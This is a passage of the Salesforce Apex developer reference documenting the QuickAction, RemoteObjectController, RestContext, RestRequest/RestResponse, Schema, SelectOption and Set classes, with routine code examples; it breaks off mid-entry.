// First 3 parameter values are for actions at the entity level.
// Last parameter is for an action at the global level.
List<QuickAction.DescribeQuickActionResult> result =
QuickAction.DescribeQuickActions(new List<String> {
'Account.QuickCreateContact', 'Opportunity.Update1',
'Contact.Create1', 'Global.CreateNewContact' });
performQuickAction(QuickAction.QuickActionRequest)
Performs the quick action specified in the quick action request and returns the action result.
Signature
public static QuickAction.QuickActionResult
performQuickAction(QuickAction.QuickActionRequest performQuickAction)
Parameters
performQuickAction
Type: QuickAction.QuickActionRequest
Return Value
Type: QuickAction.QuickActionResult
1646
Reference
QuickAction Class
performQuickAction(QuickAction.QuickActionRequest, Boolean)
Performs the quick action specified in the quick action request with the option for partial success, and returns the result.
Signature
public static QuickAction.QuickActionResult
performQuickAction(QuickAction.QuickActionRequest performQuickAction, Boolean
allOrNothing)
Parameters
performQuickAction
Type: QuickAction.QuickActionRequest
allOrNothing
Type: Boolean
Specifies whether this operation allows partial success. If you specify false for this argument and a record fails, the remainder of
the DML operation can still succeed. This method returns a result object that can be used to verify which records succeeded, which
failed, and why.
Return Value
Type: QuickAction.QuickActionResult
performQuickActions(List<QuickAction.QuickActionRequest>)
Performs the quick actions specified in the quick action request list and returns action results.
Signature
public static List<QuickAction.QuickActionResult>
performQuickActions(List<QuickAction.QuickActionRequest> performQuickActions)
Parameters
performQuickActions
Type: List<QuickAction.QuickActionRequest>
Return Value
Type: List<QuickAction.QuickActionResult>
performQuickActions(List<QuickAction.QuickActionRequest>, Boolean)
Performs the quick actions specified in the quick action request list with the option for partial success, and returns action results.
1647
Reference
RemoteObjectController
Signature
public static List<QuickAction.QuickActionResult>
performQuickActions(List<QuickAction.QuickActionRequest> performQuickActions, Boolean
allOrNothing)
Parameters
performQuickActions
Type: List<QuickAction.QuickActionRequest>
allOrNothing
Type: Boolean
Specifies whether this operation allows partial success. If you specify false for this argument and a record fails, the remainder of
the DML operation can still succeed. This method returns a result object that can be used to verify which records succeeded, which
failed, and why.
Return Value
Type: List<QuickAction.QuickActionResult>
RemoteObjectController
Use RemoteObjectController to access the standard Visualforce Remote Objects operations in your Remote Objects override
methods.
Namespace
System
Usage
RemoteObjectController is supported only for use within Remote Objects methods. See Overriding Default Remote Objects
Operations in the Visualforce Developers Guide for examples of how to use RemoteObjectController with your Visualforce
pages.
RemoteObjectController Methods
The following are methods for RemoteObjectController. All methods are static.
IN THIS SECTION:
create(String, Map<String,Object>)
Create a record in the database.
del(String, List<String>)
Delete records from the database.
retrieve(String, List<String>,Map<String,Object>)
Retrieve records from the database.
1648
Reference
RemoteObjectController
updat(String, List<String>,Map<String,Object>)
Update records in the database.
create(String, Map<String,Object>)
Create a record in the database.
Signature
public static Map<String,Object> create(String type, Map<String,Object> fields)
Parameters
type
Type: String
The sObject type on which create is being called.
fields
Type: Map<String,Object>
The fields and values to set on the new record.
Return Value
Type: Map<String,Object>
The return value is a map that represents the result of the Remote Objects operation. What is returned depends on the results of the
call.
Success
A map that contains a single element with the ID of the record created. For example, { id: 'recordId' }.
Failure
A map that contains a single element with the error message for the overall operation. For example, { error:
'errorMessage' }.
del(String, List<String>)
Delete records from the database.
Signature
public static Map<String,Object> del(String type, List<String> recordIds)
Parameters
type
Type: String
The sObject type on which delete is being called.
recordIds
Type: List<String>
The IDs of the records to be deleted.
1649
Reference
RemoteObjectController
Return Value
Type: Map<String,Object>
The return value is a map that represents the result of the Remote Objects operation. What is returned depends on how the method
was called and the results of the call.
Single DeleteSuccess
A map that contains a single element with the ID of the record that was deleted. For example, { id: 'recordId'
}.
Batch DeleteSuccess
A map that contains a single element, an array of Map<String,Object> elements. Each element contains the ID of a record that was
deleted and an array of errors, if there were any, for that records individual delete. For example, { results: [ { id:
'recordId', errors: ['errorMessage', ...]}, ...] }.
Single and Batch DeleteFailure
A map that contains a single element with the error message for the overall operation. For example, { error:
'errorMessage' }.
retrieve(String, List<String>,Map<String,Object>)
Retrieve records from the database.
Signature
public static Map<String,Object> retrieve(String type, List<String> fields,
Map<String,Object> criteria)
Parameters
type
Type: String
The sObject type on which retrieve is being called.
fields
Type: List<String>
The fields to retrieve for each record.
criteria
Type: Map<String,Object>
The criteria to use when performing the query.
Return Value
Type: Map<String,Object>
The return value is a map that represents the result of the Remote Objects operation. What is returned depends on the results of the
call.
Success
A map that contains the following elements.
records: An array of records that match the query conditions.
type: A string that indicates the type of the sObject that was retrieved.
size: The number of records in the response.
1650
Reference
ResetPasswordResult Class
Failure
A map that contains a single element with the error message for the overall operation. For example, { error:
'errorMessage' }.
updat(String, List<String>,Map<String,Object>)
Update records in the database.
Signature
public static Map<String,Object> updat(String type, List<String> recordIds,
Map<String,Object> fields)
Parameters
type
Type: String
The sObject type on which update is being called.
recordIds
Type: List<String>
The IDs of the records to be updated.
fields
Type: Map<String,Object>
The fields to update, and the value to update each field with.
Return Value
Type: Map<String,Object>
The return value is a map that represents the result of the Remote Objects operation. What is returned depends on how the method
was called and the results of the call.
Single UpdateSuccess
A map that contains a single element with the ID of the record that was updated. For example, { id: 'recordId'
}.
Batch UpdateSuccess
A map that contains a single element, an array of Map<String,Object> elements. Each element contains the ID of the record updated
and an array of errors, if there were any, for that records individual update. For example, { results: [ { id: 'recordId',
errors: ['errorMessage', ...]}, ...] }.
Single and Batch UpdateFailure
A map that contains a single element with the error message for the overall operation. For example, { error:
'errorMessage' }.
ResetPasswordResult Class
Represents the result of a password reset.
1651
Reference
RestContext Class
Namespace
System
ResetPasswordResult Methods
The following are instance methods for ResetPasswordResult.
IN THIS SECTION:
getPassword()
Returns the password generated by the System.resetPassword method call.
getPassword()
Returns the password generated by the System.resetPassword method call.
Signature
public String getPassword()
Return Value
Type: String
RestContext Class
Contains the RestRequest and RestResponse objects.
Namespace
System
Usage
Use the System.RestContext class to access the RestRequest and RestResponse objects in your Apex REST methods.
Sample
The following example shows how to use RestContext to access the RestRequest and RestResponse objects in an Apex
REST method.
@RestResource(urlMapping='/MyRestContextExample/*')
global with sharing class MyRestContextExample {
@HttpGet
global static Account doGet() {
RestRequest req = RestContext.request;
RestResponse res = RestContext.response;
String accountId = req.requestURI.substring(req.requestURI.lastIndexOf('/')+1);
1652
Reference
RestRequest Class
Account result = [SELECT Id, Name, Phone, Website FROM Account WHERE Id =
:accountId];
return result;
}
}
RestContext Properties
The following are properties for RestContext.
IN THIS SECTION:
request
Returns the RestRequest for your Apex REST method.
response
Returns the RestResponse for your Apex REST method.
request
Returns the RestRequest for your Apex REST method.
Signature
public RestRequest request {get; set;}
Property Value
Type: System.RestRequest
response
Returns the RestResponse for your Apex REST method.
Signature
public RestResponse response {get; set;}
Property Value
Type: System.RestResponse
RestRequest Class
Represents an object used to pass data from an HTTP request to an Apex RESTful Web service method.
Namespace
System
1653
Reference
RestRequest Class
Usage
Use the System.RestRequest class to pass request data into an Apex RESTful Web service method that is defined using one of
the REST annotations.
IN THIS SECTION:
RestRequest Constructors
RestRequest Properties
RestRequest Methods
1654
Reference
RestRequest Class
RestRequest Constructors
The following are constructors for RestRequest.
IN THIS SECTION:
RestRequest()
Creates a new instance of the System.RestRequest class.
RestRequest()
Creates a new instance of the System.RestRequest class.
Signature
public RestRequest()
RestRequest Properties
The following are properties for RestRequest.
Note: While the RestRequest List and Map properties are read-only, their contents are read-write. You can modify them by
calling the collection methods directly or you can use of the associated RestRequest methods shown in the previous table.
IN THIS SECTION:
headers
Returns the headers that are received by the request.
httpMethod
Returns one of the supported HTTP request methods.
params
Returns the parameters that are received by the request.
remoteAddress
Returns the IP address of the client making the request.
requestBody
Returns or sets the body of the request.
requestURI
Returns or sets everything after the host in the HTTP request string.
resourcePath
Returns the REST resource path for the request.
headers
Returns the headers that are received by the request.
Signature
public Map<String, String> headers {get; set;}
1655
Reference
RestRequest Class
Property Value
Type: Map<String, String>
httpMethod
Returns one of the supported HTTP request methods.
Signature
public String httpMethod {get; set;}
Property Value
Type: String
Possible values returned:
DELETE
GET
HEAD
PATCH
POST
PUT
params
Returns the parameters that are received by the request.
Signature
public Map <String, String> params {get; set;}
Property Value
Type: Map<String, String>
remoteAddress
Returns the IP address of the client making the request.
Signature
public String remoteAddress {get; set;}
Property Value
Type: String
1656
Reference
RestRequest Class
requestBody
Returns or sets the body of the request.
Signature
public Blob requestBody {get; set;}
Property Value
Type: Blob
Usage
If the Apex method has no parameters, then Apex REST copies the HTTP request body into the RestRequest.requestBody
property. If there are parameters, then Apex REST attempts to deserialize the data into those parameters and the data won't be deserialized
into the RestRequest.requestBody property.
requestURI
Returns or sets everything after the host in the HTTP request string.
Signature
public String requestURI {get; set;}
Property Value
Type: String
Example
For example, if the request string is https://instance.salesforce.com/services/apexrest/Account/ then
the requestURI is /services/apexrest/Account/.
resourcePath
Returns the REST resource path for the request.
Signature
public String resourcePath {get; set;}
Property Value
Type: String
Example
For example, if the Apex REST class defines a urlMapping of /MyResource/*, the resourcePath property returns
/services/apexrest/MyResource/*.
1657
Reference
RestRequest Class
RestRequest Methods
The following are methods for RestRequest. All are instance methods.
Note: At runtime, you typically don't need to add a header or parameter to the RestRequest object because they are
automatically deserialized into the corresponding properties. The following methods are intended for unit testing Apex REST
classes. You can use them to add header or parameter values to the RestRequest object without having to recreate the REST
method call.
IN THIS SECTION:
addHeader(String, String)
Adds a header to the request header map.
addParameter(String, String)
Adds a parameter to the request params map.
addHeader(String, String)
Adds a header to the request header map.
Signature
public Void addHeader(String name, String value)
Parameters
name
Type: String
value
Type: String
Return Value
Type: Void
Usage
This method is intended for unit testing of Apex REST classes.
Please note that the following headers aren't allowed:
cookie
set-cookie
set-cookie2
content-length
authorization
If any of these are used, an Apex exception will be thrown.
1658
Reference
RestResponse Class
addParameter(String, String)
Adds a parameter to the request params map.
Signature
public Void addParameter(String name, String value)
Parameters
name
Type: String
value
Type: String
Return Value
Type: Void
Usage
This method is intended for unit testing of Apex REST classes.
RestResponse Class
Represents an object used to pass data from an Apex RESTful Web service method to an HTTP response.
Namespace
System
Usage
Use the System.RestReponse class to pass response data from an Apex RESTful web service method that is defined using one
of the REST annotations on page 86.
IN THIS SECTION:
RestResponse Constructors
RestResponse Properties
RestResponse Methods
RestResponse Constructors
The following are constructors for RestResponse.
1659
Reference
RestResponse Class
IN THIS SECTION:
RestResponse()
Creates a new instance of the System.RestResponse class.
RestResponse()
Creates a new instance of the System.RestResponse class.
Signature
public RestResponse()
RestResponse Properties
The following are properties for RestResponse.
Note: While the RestResponse List and Map properties are read-only, their contents are read-write. You can modify them
by calling the collection methods directly or you can use of the associated RestResponse methods shown in the previous
table.
IN THIS SECTION:
responseBody
Returns or sets the body of the response.
headers
Returns the headers to be sent to the response.
statusCode
Returns or sets the response status code.
responseBody
Returns or sets the body of the response.
Signature
public Blob responseBody {get; set;}
Property Value
Type: Blob
Usage
The response is either the serialized form of the method return value or it's the value of the responseBody property based on the following
rules:
If the method returns void, then Apex REST returns the response in the responseBody property.
If the method returns a value, then Apex REST serializes the return value as the response.
1660
Reference
RestResponse Class
headers
Returns the headers to be sent to the response.
Signature
public Map<String, String> headers {get; set;}
Property Value
Type: Map<String, String>
statusCode
Returns or sets the response status code.
Signature
public Integer statuscode {get; set;}
Property Value
Type: Integer
Status Codes
The following are valid response status codes. The status code is returned by the RestResponse.statusCode property.
Note: If you set the RestResponse.statusCode property to a value that's not listed in the table, then an HTTP status of
500 is returned with the error message Invalid status code for HTTP response: nnn where nnn is the invalid status code value.
Status Code
Description
200
OK
201
CREATED
202
ACCEPTED
204
NO_CONTENT
206
PARTIAL_CONTENT
300
MULTIPLE_CHOICES
301
MOVED_PERMANENTLY
302
FOUND
304
NOT_MODIFIED
400
BAD_REQUEST
401
UNAUTHORIZED
403
FORBIDDEN
1661
Reference
RestResponse Class
Status Code
Description
404
NOT_FOUND
405
METHOD_NOT_ALLOWED
406
NOT_ACCEPTABLE
409
CONFLICT
410
GONE
412
PRECONDITION_FAILED
413
REQUEST_ENTITY_TOO_LARGE
414
REQUEST_URI_TOO_LARGE
415
UNSUPPORTED_MEDIA_TYPE
417
EXPECTATION_FAILED
500
INTERNAL_SERVER_ERROR
503
SERVER_UNAVAILABLE
RestResponse Methods
The following are instance methods for RestResponse.
Note: At runtime, you typically don't need to add a header to the RestResponse object because it's automatically deserialized
into the corresponding properties. The following methods are intended for unit testing Apex REST classes. You can use them to
add header or parameter values to the RestRequest object without having to recreate the REST method call.
IN THIS SECTION:
addHeader(String, String)
Adds a header to the response header map.
addHeader(String, String)
Adds a header to the response header map.
Signature
public Void addHeader(String name, String value)
Parameters
name
Type: String
value
Type: String
1662
Reference
Schedulable Interface
Return Value
Type: Void
Usage
Please note that the following headers aren't allowed:
cookie
set-cookie
set-cookie2
content-length
authorization
If any of these are used, an Apex exception will be thrown.
Schedulable Interface
The class that implements this interface can be scheduled to run at different intervals.
Namespace
System
SEE ALSO:
Apex Scheduler
Schedulable Methods
The following are methods for Schedulable.
IN THIS SECTION:
execute(SchedulableContext)
Executes the scheduled Apex job.
execute(SchedulableContext)
Executes the scheduled Apex job.
Signature
public Void execute(SchedulableContext context)
Parameters
context
Type: System.SchedulableContext
Contains the job ID.
1663
Reference
SchedulableContext Interface
Return Value
Type: Void
SchedulableContext Interface
Represents the parameter type of a method in a class that implements the Schedulable interface and contains the scheduled job
ID. This interface is implemented internally by Apex.
Namespace
System
SEE ALSO:
Schedulable Interface
SchedulableContext Methods
The following are methods for SchedulableContext.
IN THIS SECTION:
getTriggerId()
Returns the ID of the CronTrigger scheduled job.
getTriggerId()
Returns the ID of the CronTrigger scheduled job.
Signature
public Id getTriggerId()
Return Value
Type: ID
Schema Class
Contains methods for obtaining schema describe information.
Namespace
System
Schema Methods
The following are methods for Schema. All methods are static.
1664
Reference
Schema Class
IN THIS SECTION:
getGlobalDescribe()
Returns a map of all sObject names (keys) to sObject tokens (values) for the standard and custom objects defined in your organization.
describeDataCategoryGroups(List<String>)
Returns a list of the category groups associated with the specified objects.
describeSObjects(List<String>)
Describes metadata (field list and object properties) for the specified sObject or array of sObjects.
describeTabs()
Returns information about the standard and custom apps available to the running user.
describeDataCategoryGroupStructures(List<Schema.DataCategoryGroupSobjectTypePair>)
Returns available category groups along with their data category structure for objects specified in the request.
getGlobalDescribe()
Returns a map of all sObject names (keys) to sObject tokens (values) for the standard and custom objects defined in your organization.
Signature
public static Map<String, Schema.SObjectType> getGlobalDescribe()
Return Value
Type: Map<String, Schema.SObjectType>
Usage
For more information, see Accessing All sObjects.
Example
Map<String, Schema.SObjectType> gd =
Schema.getGlobalDescribe();
describeDataCategoryGroups(List<String>)
Returns a list of the category groups associated with the specified objects.
Signature
public static List<Schema.DescribeDataCategoryGroupResult>
describeDataCategoryGroups(String List<String>)
Parameters
sObjectNames
Type: List<String>
1665
Reference
Schema Class
Return Value
Type: List<Schema.DescribeDataCategoryGroupResult>
Usage
You can specify one of the following sObject names:
KnowledgeArticleVersionto retrieve category groups associated with article types.
Questionto retrieve category groups associated with questions.
For more information and code examples using describeDataCategoryGroups, see Accessing All Data Categories Associated with an
sObject.
For additional information about articles and questions, see Managing Articles and Translations and Answers Overview in the Salesforce
online help.
describeSObjects(List<String>)
Describes metadata (field list and object properties) for the specified sObject or array of sObjects.
Signature
public static List<Schema.DescribeSObjectResult> describeSObjects(List<String> types)
Parameters
types
Type: List<String>
The types argument is a list of sObject type names you want to describe.
Return Value
Type: List<Schema.DescribeSObjectResult>
Usage
This method is similar to the getDescribe method on the Schema.sObjectType token. Unlike the getDescribe method,
this method allows you to specify the sObject type dynamically and describe more than one sObject at a time.
You can first call getGlobalDescribe to retrieve a list of all objects for your organization, then iterate through the list and use
describeSObjects to obtain metadata about individual objects.
Example
Schema.DescribeSObjectResult[] descResult = Schema.describeSObjects(
new
String[]{'Account','Contact'});
describeTabs()
Returns information about the standard and custom apps available to the running user.
1666
Reference
Schema Class
Signature
public static List<Schema.DescribeTabSetResult> describeTabs()
Return Value
Type: List<Schema.DescribeTabSetResult>
Usage
An app is a group of tabs that works as a unit to provide application functionality. For example, two of the standard Salesforce apps are
Sales and Call Center.
The describeTabs method returns the minimum required metadata that can be used to render apps in another user interface.
Typically, this call is used by partner applications to render Salesforce data in another user interface, such as in a mobile or connected
app.
In the Salesforce user interface, users have access to standard apps (and might also have access to custom apps) as listed in the Salesforce
app menu at the top of the page. Selecting an app name in the menu allows the user to switch between the listed apps at any time.
Note: The All Tabs tab isnt included in the list of described tabs.
Example
This example shows how to call the describeTabs method.
Schema.DescribeTabSetResult[] tabSetDesc = Schema.describeTabs();
This is a longer example that shows how to obtain describe metadata information for the Sales app. For each tab, the example gets
describe information, such as the icon URL, whether the tab is custom or not, and colors. The describe information is written to the
debug output.
// Get tab set describes for each app
List<Schema.DescribeTabSetResult> tabSetDesc = Schema.describeTabs();
// Iterate through each tab set describe for each app and display the info
for(DescribeTabSetResult tsr : tabSetDesc) {
String appLabel = tsr.getLabel();
System.debug('Label: ' + appLabel);
System.debug('Logo URL: ' + tsr.getLogoUrl());
System.debug('isSelected: ' + tsr.isSelected());
String ns = tsr.getNamespace();
if (ns == '') {
System.debug('The ' + appLabel + ' app has no namespace defined.');
}
else {
System.debug('Namespace: ' + ns);
}
// Display tab info for the Sales app
if (appLabel == 'Sales') {
List<Schema.DescribeTabResult> tabDesc = tsr.getTabs();
System.debug('-- Tab information for the Sales app --');
for(Schema.DescribeTabResult tr : tabDesc) {
System.debug('getLabel: ' + tr.getLabel());
1667
Reference
Schema Class
describeDataCategoryGroupStructures(List<Schema.DataCategoryGroupSobjectTypePair>)
Returns available category groups along with their data category structure for objects specified in the request.
Signature
public static List<Schema.DescribeDataCategoryGroupStructureResult> describeDataCategory
GroupStructures(List<Schema.DataCategoryGroupSobjectTypePair> pairs)
Parameters
pairs
Type: List<Schema.DataCategoryGroupSobjectTypePair>
The pairs argument is one or more category groups and objects to query Schema.DataCategoryGroupSobjectTypePairs. Visible
data categories are retrieved for the specified object. For more information on data category group visibility, see About Category
Group Visibility in the Salesforce online help.
1668
Reference
Search Class
Return Value
Type: List<Schema.DescribeDataCategoryGroupStructureResult>
Search Class
Used with dynamic SOSL queries.
Namespace
System
Search Methods
The following are static methods for Search.
IN THIS SECTION:
query(String)
Creates a dynamic SOSL query at run time.
query(String)
Creates a dynamic SOSL query at run time.
Signature
public static sObject[sObject[]] query(String query)
Parameters
query
Type: String
Return Value
Type: sObject[sObject[]]
Usage
This method can be used wherever a static SOSL query can be used, such as in regular assignment statements and for loops.
For more information, see Dynamic SOQL.
SelectOption Class
A SelectOption object specifies one of the possible values for a Visualforce selectCheckboxes, selectList, or
selectRadio component.
1669
Reference
SelectOption Class
Namespace
System
SelectOption consists of a label that is displayed to the end user, and a value that is returned to the controller if the option is
selected. A SelectOption can also be displayed in a disabled state, so that a user cannot select it as an option, but can still view it.
Instantiation
In a custom controller or controller extension, you can instantiate a SelectOption in one of the following ways:
where value is the String that is returned to the controller if the option is selected by a user, label is the String that is displayed
to the user as the option choice, and isDisabled is a Boolean that, if true, specifies that the user cannot select the option, but
can still view it.
where value is the String that is returned to the controller if the option is selected by a user, and label is the String that is
displayed to the user as the option choice. Because a value for isDisabled is not specified, the user can both view and select
the option.
Example
The following example shows how a list of SelectOptions objects can be used to provide possible values for a selectCheckboxes
component on a Visualforce page. In the following custom controller, the getItems method defines and returns the list of possible
SelectOption objects:
public class sampleCon {
String[] countries = new String[]{};
public PageReference test() {
return null;
}
public List<SelectOption> getItems() {
List<SelectOption> options = new List<SelectOption>();
options.add(new SelectOption('US','US'));
options.add(new SelectOption('CANADA','Canada'));
options.add(new SelectOption('MEXICO','Mexico'));
return options;
}
public String[] getCountries() {
return countries;
}
public void setCountries(String[] countries) {
this.countries = countries;
}
}
1670
Reference
SelectOption Class
In the following page markup, the <apex:selectOptions> tag uses the getItems method from the controller above to
retrieve the list of possible values. Because <apex:selectOptions> is a child of the <apex:selectCheckboxes> tag,
the options are displayed as checkboxes:
<apex:page controller="sampleCon">
<apex:form>
<apex:selectCheckboxes value="{!countries}">
<apex:selectOptions value="{!items}"/>
</apex:selectCheckboxes><br/>
<apex:commandButton value="Test" action="{!test}" rerender="out" status="status"/>
</apex:form>
<apex:outputPanel id="out">
<apex:actionstatus id="status" startText="testing...">
<apex:facet name="stop">
<apex:outputPanel>
<p>You have selected:</p>
<apex:dataList value="{!countries}" var="c">{!c}</apex:dataList>
</apex:outputPanel>
</apex:facet>
</apex:actionstatus>
</apex:outputPanel>
</apex:page>
IN THIS SECTION:
SelectOption Constructors
SelectOption Methods
SelectOption Constructors
The following are constructors for SelectOption.
IN THIS SECTION:
SelectOption(String, String)
Creates a new instance of the SelectOption class using the specified value and label.
SelectOption(String, String, Boolean)
Creates a new instance of the SelectOption class using the specified value, label, and disabled setting.
SelectOption(String, String)
Creates a new instance of the SelectOption class using the specified value and label.
Signature
public SelectOption(String value, String label)
Parameters
value
Type: String
1671
Reference
SelectOption Class
The string that is returned to the Visualforce controller if the option is selected by a user.
label
Type: String
The string that is displayed to the user as the option choice.
Signature
public SelectOption(String value, String label, Boolean isDisabled)
Parameters
value
Type: String
The string that is returned to the Visualforce controller if the option is selected by a user.
label
Type: String
The string that is displayed to the user as the option choice.
isDisabled
Type: Boolean
If set to true, the option cant be selected by the user but can still be viewed.
SelectOption Methods
The following are methods for SelectOption. All are instance methods.
IN THIS SECTION:
getDisabled()
Returns the current value of the SelectOption object's isDisabled attribute.
getEscapeItem()
Returns the current value of the SelectOption object's itemEscaped attribute.
getLabel()
Returns the option label that is displayed to the user.
getValue()
Returns the option value that is returned to the controller if a user selects the option.
setDisabled(Boolean)
Sets the value of the SelectOption object's isDisabled attribute.
setEscapeItem(Boolean)
Sets the value of the SelectOption object's itemEscaped attribute.
1672
Reference
SelectOption Class
setLabel(String)
Sets the value of the option label that is displayed to the user.
setValue(String)
Sets the value of the option value that is returned to the controller if a user selects the option.
getDisabled()
Returns the current value of the SelectOption object's isDisabled attribute.
Signature
public Boolean getDisabled()
Return Value
Type: Boolean
Usage
If isDisabled is set to true, the user can view the option, but cannot select it. If isDisabled is set to false, the user can
both view and select the option.
getEscapeItem()
Returns the current value of the SelectOption object's itemEscaped attribute.
Signature
public Boolean getEscapeItem()
Return Value
Type: Boolean
Usage
If itemEscaped is set to true, sensitive HTML and XML characters are escaped in the HTML output generated by this component.
If itemEscaped is set to false, items are rendered as written.
getLabel()
Returns the option label that is displayed to the user.
Signature
public String getLabel()
Return Value
Type: String
1673
Reference
SelectOption Class
getValue()
Returns the option value that is returned to the controller if a user selects the option.
Signature
public String getValue()
Return Value
Type: String
setDisabled(Boolean)
Sets the value of the SelectOption object's isDisabled attribute.
Signature
public Void setDisabled(Boolean isDisabled)
Parameters
isDisabled
Type: Boolean
Return Value
Type: Void
Usage
If isDisabled is set to true, the user can view the option, but cannot select it. If isDisabled is set to false, the user can
both view and select the option.
setEscapeItem(Boolean)
Sets the value of the SelectOption object's itemEscaped attribute.
Signature
public Void setEscapeItem(Boolean itemsEscaped)
Parameters
itemsEscaped
Type: Boolean
Return Value
Type: Void
1674
Reference
Set Class
Usage
If itemEscaped is set to true, sensitive HTML and XML characters are escaped in the HTML output generated by this component.
If itemEscaped is set to false, items are rendered as written.
setLabel(String)
Sets the value of the option label that is displayed to the user.
Signature
public Void setLabel(String label)
Parameters
label
Type: String
Return Value
Type: Void
setValue(String)
Sets the value of the option value that is returned to the controller if a user selects the option.
Signature
public Void setValue(String value)
Parameters
value
Type: String
Return Value
Type: Void
Set Class
Represents a collection of unique elements with no duplicate values.
Namespace
System
1675
Reference
Set Class
Usage
The Set methods work on a set, that is, an unordered collection of elements that was initialized using the set keyword. Set elements
can be of any data typeprimitive types, collections, sObjects, user-defined types, and built-in Apex types. Set methods are all instance
methods, that is, they all operate on a particular instance of a Set. The following are the instance methods for sets.
Note:
Uniqueness of set elements of user-defined types is determined by the equals and hashCode methods, which you
provide in your classes. Uniqueness of all other non-primitive types is determined by comparing the objects fields.
If the set contains String elements, the elements are case-sensitive. Two set elements that differ only by case are considered
distinct.
For more information on sets, see Sets on page 32.
IN THIS SECTION:
Set Constructors
Set Methods
Set Constructors
The following are constructors for Set.
IN THIS SECTION:
Set<T>()
Creates a new instance of the Set class. A set can hold elements of any data type T.
Set<T>(Set<T>)
Creates a new instance of the Set class by copying the elements of the specified set. T is the data type of the elements in both sets
and can be any data type.
Set<T>(List<T>)
Creates a new instance of the Set class by coping the list elements. T is the data type of the elements in the set and list and can
be any data type.
Set<T>()
Creates a new instance of the Set class. A set can hold elements of any data type T.
Signature
public Set<T>()
Example
// Create a set of strings
Set<String> s1 = new Set<String>();
// Add two strings to it
s1.add('item1');
s1.add('item2');
1676
Reference
Set Class
Set<T>(Set<T>)
Creates a new instance of the Set class by copying the elements of the specified set. T is the data type of the elements in both sets
and can be any data type.
Signature
public Set<T>(Set<T> setToCopy)
Parameters
setToCopy
Type: Set<T>
The set to initialize this set with.
Example
Set<String> s1 = new Set<String>();
s1.add('item1');
s1.add('item2');
Set<String> s2 = new Set<String>(s1);
// The set elements in s2 are copied from s1
System.debug(s2);
Set<T>(List<T>)
Creates a new instance of the Set class by coping the list elements. T is the data type of the elements in the set and list and can be
any data type.
Signature
public Set<T>(List<T> listToCopy)
Parameters
listToCopy
Type: Integer
The list to copy the elements of into this set.
Example
List<Integer> ls = new List<Integer>();
ls.add(1);
ls.add(2);
// Create a set based on a list
Set<Integer> s1 = new Set<Integer>(ls);
// Elements are copied from the list to this set
System.debug(s1);// DEBUG|{1, 2}
1677
Reference
Set Class
Set Methods
The following are methods for Set. All are instance methods.
IN THIS SECTION:
add(Object)
Adds an element to the set if it is not already present.
addAll(List<Object>)
Adds all of the elements in the specified list to the set if they are not already present.
addAll(Set<Object>)
Adds all of the elements in the specified set to the set that calls the method if they are not already present.
clear()
Removes all of the elements from the set.
clone()
Makes a duplicate copy of the set.
contains(Object)
Returns true if the set contains the specified element.
containsAll(List<Object>)
Returns true if the set contains all of the elements in the specified list. The list must be of the same type as the set that calls the
method.
containsAll(Set<Object>)
Returns true if the set contains all of the elements in the specified set. The specified set must be of the same type as the original
set that calls the method.
equals(Set<Object>)
Compares this set with the specified set and returns true if both sets are equal; otherwise, returns false.
hashCode()
Returns the hashcode corresponding to this set and its contents.
isEmpty()
Returns true if the set has zero elements.
remove(Object)
Removes the specified element from the set if it is present.
removeAll(List<Object>)
Removes the elements in the specified list from the set if they are present.
removeAll(Set<Object>)
Removes the elements in the specified set from the original set if they are present.
retainAll(List<Object>)
Retains only the elements in this set that are contained in the specified list.
retainAll(Set)
Retains only the elements in the original set that are contained in the specified set.
size()
Returns the number of elements in the set (its cardinality).
1678
Reference
Set Class
add(Object)
Adds an element to the set if it is not already present.
Signature
public Boolean add(Object setElement)
Parameters
setElement
Type: Object
Return Value
Type: Boolean
Usage
This method returns true if the original set changed as a result of the call. For example:
set<string> myString =
new Set<String>{'a', 'b', 'c'};
Boolean result;
result = myString.add('d');
system.assertEquals(result, true);
addAll(List<Object>)
Adds all of the elements in the specified list to the set if they are not already present.
Signature
public Boolean addAll(List<Object> fromList)
Parameters
fromList
Type: List
Return Value
Type: Boolean
Returns true if the original set changed as a result of the call.
Usage
This method results in the union of the list and the set. The list must be of the same type as the set that calls the method.
addAll(Set<Object>)
Adds all of the elements in the specified set to the set that calls the method if they are not already present.
1679
Reference
Set Class
Signature
public Boolean addAll(Set<Object> fromSet)
Parameters
fromSet
Type: Set<Object>
Return Value
Type: Boolean
This method returns true if the original set changed as a result of the call.
Usage
This method results in the union of the two sets. The specified set must be of the same type as the original set that calls the method.
Example
set<string> myString =
new Set<String>{'a', 'b'};
set<string> sString =
new Set<String>{'c'};
Boolean result1;
result1 = myString.addAll(sString);
system.assertEquals(result1, true);
clear()
Removes all of the elements from the set.
Signature
public Void clear()
Return Value
Type: Void
clone()
Makes a duplicate copy of the set.
Signature
public Set<Object> clone()
1680
Reference
Set Class
Return Value
Type: Set (of same type)
contains(Object)
Returns true if the set contains the specified element.
Signature
public Boolean contains(Object setElement)
Parameters
setElement
Type: Object
Return Value
Type: Boolean
Example
set<string> myString =
new Set<String>{'a', 'b'};
Boolean result;
result = myString.contains('z');
system.assertEquals(result, false);
containsAll(List<Object>)
Returns true if the set contains all of the elements in the specified list. The list must be of the same type as the set that calls the method.
Signature
public Boolean containsAll(List<Object> listToCompare)
Parameters
listToCompare
Type: List<Object>
Return Value
Type: Boolean
containsAll(Set<Object>)
Returns true if the set contains all of the elements in the specified set. The specified set must be of the same type as the original set
that calls the method.
1681
Reference
Set Class
Signature
public Boolean containsAll(Set<Object> setToCompare)
Parameters
setToCompare
Type: Set<Object>
Return Value
Type: Boolean
Example
set<string> myString =
new Set<String>{'a', 'b'};
set<string> sString =
new Set<String>{'c'};
set<string> rString =
new Set<String>{'a', 'b', 'c'};
Boolean result1, result2;
result1 = myString.addAll(sString);
system.assertEquals(result1, true);
result2 = myString.containsAll(rString);
system.assertEquals(result2, true);
equals(Set<Object>)
Compares this set with the specified set and returns true if both sets are equal; otherwise, returns false.
Signature
public Boolean equals(Set<Object> set2)
Parameters
set2
Type: Set<Object>
The set2 argument is the set to compare this set with.
Return Value
Type: Boolean
Usage
Two sets are equal if their elements are equal, regardless of their order. The == operator is used to compare the elements of the sets.
1682
Reference
Set Class
The == operator is equivalent to calling the equals method, so you can call set1.equals(set2); instead of set1 ==
set2;.
hashCode()
Returns the hashcode corresponding to this set and its contents.
Signature
public Integer hashCode()
Return Value
Type: Integer
isEmpty()
Returns true if the set has zero elements.
Signature
public Boolean isEmpty()
Return Value
Type: Boolean
Example
Set<integer> mySet =
new Set<integer>();
Boolean result;
result = mySet.isEmpty();
system.assertEquals(result, true);
remove(Object)
Removes the specified element from the set if it is present.
Signature
